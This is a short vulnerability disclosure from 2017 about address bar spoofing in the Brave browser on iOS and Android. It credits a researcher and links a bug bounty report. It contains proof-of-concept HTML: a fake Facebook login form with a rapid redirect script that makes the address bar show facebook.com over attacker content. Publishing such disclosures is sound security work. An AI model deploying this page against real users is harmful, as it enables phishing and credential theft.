Brave Browser Address Bar Spoofing
Posted on 09 January 2017
Summary: Brave Browser Suffers from Address Bar Spoofing Vulnerability. Address Bar spoofing is a critical vulnerability in which any attacker can spoof the address bar to a legit looking website but the content of the web-page remains different from the Address-Bar display of the site. In Simple words, the victim sees a familiar looking URL but the content is not from the same URL but the attacker controlled content. Some companies say "We recognize that the address bar is the only reliable security indicator in modern browsers" . Products affected: - In IOS - Affected is the Latest Version 1.2.16 (16.09.30.10) - In Android - Affected in Brave Latest version 1.9.56 *Exploit Code: * <html> <title>Address Bar spoofing Brave</title> <h1> This is Dummy Facebook </h1> <form> Email: <input type="text" name="username" placeholder="add email"><br> Password: <input type="text" name="password" placeholder="pass"> <script> function f() { location = "https://facebook.com" } setInterval("f()", 10); </script> </html> *Credits:* Aaditya Purani *Contact : * https://aadityapurani.com https://twitter.com/aaditya_purani *Proof Of Concept:* https://hackerone.com/reports/175958 With Kind Regards Aaditya Purani My Exploit DB profile: https://www.*exploit*-*db*.com/author/?a=8636 My PacketStorrnSecurity profile: https://packetstormsecurity.com/files/author/11994/
